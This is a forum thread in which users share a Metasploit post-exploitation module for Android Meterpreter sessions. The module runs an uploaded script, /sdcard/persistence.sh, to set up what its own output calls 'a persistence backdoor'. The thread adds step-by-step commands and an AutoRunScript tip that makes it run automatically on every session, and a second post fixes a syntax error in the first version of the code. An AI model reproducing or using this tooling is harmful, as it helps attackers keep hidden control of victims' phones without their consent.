Forum Thread: How to Autorun Android Command Through Shell in Meterpreter?

Have you resolved the issue? I'm facing the same problem

I think i might have a solution to the problem
i created a post android module
touch postmodule.rb
copy it to the metasploit source directory
cp postmodule /usr/share/metasploit-framework/modules/post/android/manage/
now paste this code into the postmodule.rb file in the metasploit folder

class MetasploitModule < Msf::Post
include Msf::Post::Common

def initialize(info={})
super( update_info( info, {
'Name' => "script_runner",
'Description' => %q{
This module runs any .sh script on android using android shell
},
'License' => MSF_LICENSE,
'Author' => 'Anonymous' ,
'SessionTypes' => 'meterpreter',
'Platform' => 'android',
}
))
end

def run
print_status("Running persistence script")
cmd_exec("sh /sdcard/persistence.sh")
end

print_status("You now have a persistence backdoor")
end
end

notice in the code you need to name the file persistence.sh and upload to /sdcard before you run the post module

now when that is finish you:
backgroung the meterpreter session by running
background
run the post module by
use post/android/manage/postmodule.rb
set session <metasploit sessions>
to know your metasploit session type
sessions
finnally run the post module by typing
run

you could write the .rc file to automatically background the sessions and run the post module, i am suspecting that you already know this. I had this same problem and didnt know what to do then i wondered how does metasploit run post module. I checked out one of the post module script, having prior programming knowledge of python i was able to understand the ruby code, anyways what i understand is that in the common.rb file there is a class i cant remember but it has the cmd_exe method. Im not sure, but I think this method guess the kind of meterpreter sessions you have either android or windows and then i create a channel of some sort not sure maybe someone could explain. Anyways with this, you could run any non root comamand. this was very simple but the point is you just have to read and understand. I think i will do some forther researching to add rooted command. I think there is another file or class called :priv which will do this im not sure.

OH BTW i created this account with temp mail so i dont know if this post will last lol

Thanks bro... It is working..
I comments here with small modifications for other members simplicity
There is small syntax error on above script..
The revision version for postmodule. rb Is something like below...

class MetasploitModule < Msf::Post
include Msf::Post::Common
def initialize(info={})
super( update_info( info, {
'Name' => "script_runner",
'Description' => %q{
This module runs any .sh script on android using android shell
},
'License' => MSF_LICENSE,
'Author' => 'Anonymous' ,
'SessionTypes' => 'meterpreter',
'Platform' => 'android',
}
))
end
def run
print_status("Running persistence script")
cmd_exec("sh /sdcard/persistence.sh")
print_status("You now have a persistence backdoor")
end
end

You can call this without going to background..using metapreter..Like this
run post/android/manage/postmodule
If you add above line to AutoRunScript.. Everything works well in automatically.

i told this to new members and not for the original comment owner. He is a great friend.. He explained the solution clearly. I added additional things.